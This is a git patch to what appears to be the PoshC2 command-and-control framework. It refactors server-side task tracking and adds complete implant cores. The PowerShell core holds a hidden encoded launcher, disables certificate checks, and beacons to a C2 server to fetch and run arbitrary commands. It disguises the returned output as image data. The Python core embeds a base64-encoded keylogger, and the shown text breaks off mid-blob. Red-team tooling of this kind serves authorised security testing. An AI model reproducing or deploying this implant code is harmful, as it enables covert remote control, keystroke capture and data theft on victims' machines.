From 2fea962466fae305ce4109757315d5b1819b990b Mon Sep 17 00:00:00 2001 From: m0rv4i Date: Wed, 6 Feb 2019 16:11:18 +0000 Subject: [PATCH] * Refactor tasks to insert on run and update on complete * Pull out py and ps cores into files * Adjust command stored in DB to be user run command (tracking modules loaded etc) * Fixed downloading files so subsequent files with the same name will ba name-1 name-2 etc * Renamed Implant-Core.ps1 to Core.ps1 to match C# --- C2Server.py | 92 ++++- C2Viewer.py | 4 +- DB.py | 52 ++- Files/PSImplant-Core.ps1 | 272 +++++++++++++ Files/PyImplant-Core.py | 215 ++++++++++ Files/Sharp.cs | 51 +-- HTML.py | 16 +- Implant.py | 518 +------------------------ ImplantHandler.py | 8 +- Modules/{Implant-Core.ps1 => Core.ps1} | 34 +- OfflineReportGenerator.py | 16 +- Tasks.py | 7 + 12 files changed, 678 insertions(+), 607 deletions(-) create mode 100644 Files/PSImplant-Core.ps1 create mode 100644 Files/PyImplant-Core.py rename Modules/{Implant-Core.ps1 => Core.ps1} (96%) diff --git a/C2Server.py b/C2Server.py index c6269f4..6b79768 100644 --- a/C2Server.py +++ b/C2Server.py @@ -226,7 +226,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): cookieVal = (s.cookieHeader).replace("SessionID=","") post_data = s.rfile.read(content_length) logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data) - now = datetime.datetime.now() result = get_implants_all() for i in result: @@ -239,6 +238,18 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): if RandomURI in s.path and cookieVal: update_implant_lastseen(now.strftime("%m/%d/%Y %H:%M:%S"),RandomURI) decCookie = decrypt(encKey, cookieVal) + if decCookie.startswith("Error"): + print (Colours.RED) + print ("The multicmd errored: ") + print (decrypt_bytes_gzip(encKey, post_data[1500:])) + print (Colours.GREEN) + s.send_response(200) + s.send_header("Content-type", "text/html") + s.end_headers() + s.wfile.write(default_response()) + return + taskId = str(int(decCookie.strip('\x00'))) + executedCmd = get_cmd_from_task_id(taskId) print (Colours.GREEN) print ("Command returned against implant %s on host %s\\%s @ %s (%s)" % (implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) #print decCookie,Colours.END @@ -246,52 +257,91 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = outputParsed.rstrip() - if "ModuleLoaded" in decCookie: + if "loadmodule" in executedCmd: print ("Module loaded sucessfully") - insert_completedtask(RandomURI, decCookie, "Module loaded sucessfully", "") - if "get-screenshot" in decCookie.lower() or "screencapture" in decCookie.lower(): + update_task(taskId, "Module loaded sucessfully") + if "get-screenshot" in executedCmd.lower() or "screencapture" in executedCmd.lower(): try: decoded = base64.b64decode(outputParsed) filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_"+randomuri()) output_file = open('%s%s.png' % (DownloadsDirectory,filename), 'wb') print ("Screenshot captured: %s%s.png" % (DownloadsDirectory,filename)) - insert_completedtask(RandomURI, decCookie, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename), "") + update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename)) output_file.write(decoded) output_file.close() except Exception as e: - insert_completedtask(RandomURI, decCookie, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!", "") + update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!") print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!") - elif (decCookie.lower().startswith("$shellcode64")) or (decCookie.lower().startswith("$shellcode64")): - insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "") + # What should this be now? + elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")): + update_task(taskId, "Upload shellcode complete") print ("Upload shellcode complete") - elif (decCookie.lower().startswith("run-exe core.program core inject-shellcode")): - insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "") + elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")): + update_task(taskId, "Upload shellcode complete") print (outputParsed) - elif "download-file" in decCookie.lower(): + elif "download-file" in executedCmd.lower(): try: rawoutput = decrypt_bytes_gzip(encKey, (post_data[1500:])) - filename = decCookie.lower().replace("download-file ","") + filename = executedCmd.lower().replace("download-file ","") + filename = filename.replace("-source ","") filename = filename.replace("..","") + filename = filename.replace("'","") + filename = filename.replace('"',"") filename = filename.rsplit('/', 1)[-1] filename = filename.rsplit('\\', 1)[-1] filename = filename.rstrip('\x00') - chunkNumber = rawoutput[:5] - totalChunks = rawoutput[5:10] - print ("Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename)) - insert_completedtask(RandomURI, decCookie, "Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename), "") - output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a') - output_file.write(rawoutput[10:]) - output_file.close() + original_filename = filename + if rawoutput.startswith("Error"): + print("Error downloading file: ") + print rawoutput + else: + chunkNumber = rawoutput[:5] + totalChunks = rawoutput[5:10] + if (chunkNumber == "00001") and os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)): + counter = 1 + while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))): + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + counter+=1 + if (chunkNumber != "00001"): + counter = 1 + if not os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)): + print("Error trying to download part of a file to a file that does not exist: %s" % filename) + while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))): + # First find the 'next' file would be downloaded to + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + counter+=1 + if counter != 2: + # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + else: + filename = original_filename + print ("Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename)) + update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename)) + output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a') + output_file.write(rawoutput[10:]) + output_file.close() except Exception as e: - insert_completedtask(RandomURI, decCookie, "Error downloading file %s " % e, "") + update_task(taskId, "Error downloading file %s " % e) print ("Error downloading file %s " % e) else: - insert_completedtask(RandomURI, decCookie, outputParsed, "") + update_task(taskId, outputParsed) print (Colours.GREEN) print (outputParsed + Colours.END) except Exception as e: e = "" + # print e + # traceback.print_exc() + finally: s.send_response(200) s.send_header("Content-type", "text/html") diff --git a/C2Viewer.py b/C2Viewer.py index ba7f092..628761e 100644 --- a/C2Viewer.py +++ b/C2Viewer.py @@ -23,7 +23,7 @@ print (logopic) print (Colours.END + "") try: - taskid = get_seqcount("CompletedTasks") + 1 + taskid = get_seqcount("Tasks") + 1 except Exception as e: user = "None" taskid = 1 @@ -64,7 +64,7 @@ while(1): user = "None" try: - completedtask = get_completedtasksbyid(taskid) + completedtask = get_tasksbyid(taskid) hostinfo = get_hostinfo(completedtask[2]) now = datetime.datetime.now() if hostinfo: diff --git a/DB.py b/DB.py index 8d6b021..283a0e9 100644 --- a/DB.py +++ b/DB.py @@ -30,15 +30,16 @@ def initializedb(): TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, Task TEXT);""" - create_completedtasks = """CREATE TABLE CompletedTasks ( - CompletedTaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, - TaskID TEXT, + create_tasks = """CREATE TABLE Tasks ( + TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, RandomURI TEXT, Command TEXT, Output TEXT, - Prompt TEXT);""" + User TEXT, + SentTime TEXT, + CompletedTime TEXT);""" - create_tasks = """CREATE TABLE NewTasks ( + create_newtasks = """CREATE TABLE NewTasks ( TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, RandomURI TEXT, Command TEXT);""" @@ -97,8 +98,8 @@ def initializedb(): if conn is not None: c.execute(create_implants) c.execute(create_autoruns) - c.execute(create_completedtasks) c.execute(create_tasks) + c.execute(create_newtasks) c.execute(create_creds) c.execute(create_urls) c.execute(create_c2server) @@ -365,15 +366,29 @@ def new_implant(RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, c.execute("INSERT INTO Implants (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label)) conn.commit() -def insert_completedtask(randomuri, command, output, prompt): +def insert_task(randomuri, command, user): now = datetime.datetime.now() - TaskID = now.strftime("%m/%d/%Y %H:%M:%S") + sent_time = now.strftime("%m/%d/%Y %H:%M:%S") conn = sqlite3.connect(DB) conn.text_factory = str conn.row_factory = sqlite3.Row c = conn.cursor() - c.execute("INSERT INTO CompletedTasks (TaskID, RandomURI, Command, Output, Prompt) VALUES (?, ?, ?, ?, ?)", (TaskID, randomuri, command, output, prompt)) + if user is None: + user = "" + c.execute("INSERT INTO Tasks (RandomURI, Command, Output, User, SentTime, CompletedTime) VALUES (?, ?, ?, ?, ?, ?)", (randomuri, command, "", user, sent_time, "")) conn.commit() + return c.lastrowid + +def update_task(taskId, output): + now = datetime.datetime.now() + completedTime = now.strftime("%m/%d/%Y %H:%M:%S") + conn = sqlite3.connect(DB) + conn.text_factory = str + conn.row_factory = sqlite3.Row + c = conn.cursor() + c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=%s" % taskId, (output, completedTime)) + conn.commit() + return c.lastrowid def update_item(column, table, value, wherecolumn=None, where=None): conn = sqlite3.connect(DB) @@ -395,22 +410,22 @@ def get_implantbyid(id): else: return None -def get_completedtasks(): +def get_tasks(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() - c.execute("SELECT * FROM CompletedTasks") + c.execute("SELECT * FROM Tasks") result = c.fetchall() if result: return result else: return None -def get_completedtasksbyid(id): +def get_tasksbyid(id): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row c = conn.cursor() - c.execute("SELECT * FROM CompletedTasks WHERE CompletedTaskID=%s" % id) + c.execute("SELECT * FROM Tasks WHERE CompletedTaskID=%s" % id) result = c.fetchone() if result: return result @@ -461,6 +476,17 @@ def get_dfheader(): else: return None +def get_cmd_from_task_id(taskId): + conn = sqlite3.connect(DB) + conn.row_factory = sqlite3.Row + c = conn.cursor() + c.execute("SELECT Command FROM Tasks WHERE TaskId=%s" % taskId) + result = str(c.fetchone()[0]) + if result: + return result + else: + return None + def get_defaultuseragent(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row diff --git a/Files/PSImplant-Core.ps1 b/Files/PSImplant-Core.ps1 new file mode 100644 index 0000000..bf8435d --- /dev/null +++ b/Files/PSImplant-Core.ps1 @@ -0,0 +1,272 @@ +$key="%s" +$global:sleeptime = '%s' + +$payloadclear = @" +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} +`$s="$s" +`$sc="$sc" +function DEC {${function:DEC}} +function ENC {${function:ENC}} +function CAM {${function:CAM}} +function Get-Webclient {${function:Get-Webclient}} +function Primer {${function:primer}} +`$primer = primer +if (`$primer) {`$primer| iex} else { +start-sleep 1800 +primer | iex } +"@ + +$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) +$CompressedStream = New-Object IO.MemoryStream +$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) +$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) +$DeflateStream.Dispose() +$CompressedScriptBytes = $CompressedStream.ToArray() +$CompressedStream.Dispose() +$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) +$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" +$UnicodeEncoder = New-Object System.Text.UnicodeEncoding +$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) +$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" +$payload = $payloadraw -replace "`n", "" + +function GetImgData($cmdoutput) { + $icoimage = @(%s) + + try {$image = $icoimage|get-random}catch{} + + function randomgen + { + param ( + [int]$Length + ) + $set = "...................@..........................Tyscf".ToCharArray() + $result = "" + for ($x = 0; $x -lt $Length; $x++) + {$result += $set | Get-Random} + return $result + } + $imageBytes = [Convert]::FromBase64String($image) + $maxbyteslen = 1500 + $maxdatalen = 1500 + ($cmdoutput.Length) + $imagebyteslen = $imageBytes.Length + $paddingbyteslen = $maxbyteslen - $imagebyteslen + $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) + $ImageBytesFull = New-Object byte[] $maxdatalen + [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) + [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) + [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) + $ImageBytesFull +} +function Create-AesManagedObject($key, $IV) { + try { + $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" + } catch { + $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" + } + $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC + $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros + $aesManaged.BlockSize = 128 + $aesManaged.KeySize = 256 + if ($IV) { + if ($IV.getType().Name -eq "String") { + $aesManaged.IV = [System.Convert]::FromBase64String($IV) + } + else { + $aesManaged.IV = $IV + } + } + if ($key) { + if ($key.getType().Name -eq "String") { + $aesManaged.Key = [System.Convert]::FromBase64String($key) + } + else { + $aesManaged.Key = $key + } + } + $aesManaged +} + +function Encrypt-String($key, $unencryptedString) { + $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); + [byte[]] $fullData = $aesManaged.IV + $encryptedData + #$aesManaged.Dispose() + [System.Convert]::ToBase64String($fullData) +} +function Encrypt-Bytes($key, $bytes) { + [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream + $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) + $gzipStream.Write( $bytes, 0, $bytes.Length ) + $gzipStream.Close() + $bytes = $output.ToArray() + $output.Close() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String($key, $encryptedStringWithIV) { + $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor(); + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); + #$aesManaged.Dispose() + [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) +} +function Encrypt-String2($key, $unencryptedString) { + $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $CompressedStream = New-Object IO.MemoryStream + $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) + $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) + $DeflateStream.Dispose() + $bytes = $CompressedStream.ToArray() + $CompressedStream.Dispose() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String2($key, $encryptedStringWithIV) { + $bytes = $encryptedStringWithIV + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor() + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) + $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() + $output + #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) +} + +function Send-Response($Server, $Key, $TaskId, $Data) { + try{ + $eid = Encrypt-String $Key $TaskId + $Output = Encrypt-String2 $Key $Data + $UploadBytes = getimgdata $Output + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null + } catch { + Write-Host "ErrorResponse: " + $error[0] + } +} + +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} + +$URI= "%s" +$Server = "$s/%s" +$ServerClean = "$sc" +while($true) +{ + $ServerURLS = "$($ServerClean)","$($ServerClean)" + $date = (Get-Date -Format "dd/MM/yyyy") + $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) + $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) + if ($killdate -lt $date) {exit} + $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) + $newsleep = $sleeptimeran|get-random + if ($newsleep -lt 1) {$newsleep = 5} + start-sleep $newsleep + $URLS = %s + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} + + while($ReadCommand) { + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} + $error.clear() + try { + if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { + if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { + $splitcmd = $ReadCommandClear -replace "multicmd","" + $split = $splitcmd -split "!d-3dion@LD!-d" + foreach ($i in $split){ + $id = New-Object System.String($i, 0, 5) + $c = New-Object System.String($i, 5, ($i.Length - 5)) + $i = $c + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + $error.clear() + if ($i.ToLower().StartsWith("upload-file")) { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } # $result doesn't appear to be used anywhere? + } catch { + $Output = "ErrorUpload: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("download-file")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorDownload: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("loadmodule")) { + try { + $modulename = $i -replace "LoadModule","" + $Output = Invoke-Expression $modulename | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + } catch { + $Output = "ErrorLoadMod: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("get-screenshotallwindows")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorScreenshotAllWindows: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("get-webpage")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorGetWebpage: " + $error[0] + Send-Response $Server $key $id $Output + } + }else { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + $StdError = ($error[0] | Out-String) + if ($StdError){ + $Output = $Output + $StdError + $error.clear() + } + } catch { + $Output = "ErrorCmd: " + $error[0] + } + Send-Response $Server $key $id $Output + } + } + } + + $ReadCommandClear = $null + $ReadCommand = $null + } + } catch { + $message = $_.Exception.Message + Send-Response $Server $key "Error" $message + } + break + } +} \ No newline at end of file diff --git a/Files/PyImplant-Core.py b/Files/PyImplant-Core.py new file mode 100644 index 0000000..deb3a3c --- /dev/null +++ b/Files/PyImplant-Core.py @@ -0,0 +1,215 @@ +import urllib2, os, subprocess, re, datetime, time, base64, string, random +hh = '%s' +timer = %s +icoimage = [%s] +urls = [%s] +kd=time.strptime("%s","%%d/%%m/%%Y") +useragent = "" +imbase = "%s" + +def keylog(): + # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py + import os,time,base64,subprocess,uuid + filename = "/tmp/%%s" %% uuid.uuid4().hex + b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WTNNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lDQkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5pa05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZMlZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0eE1qZ3BMbVZoWTJnZ1pHOGdmR3Q4RFFvZ0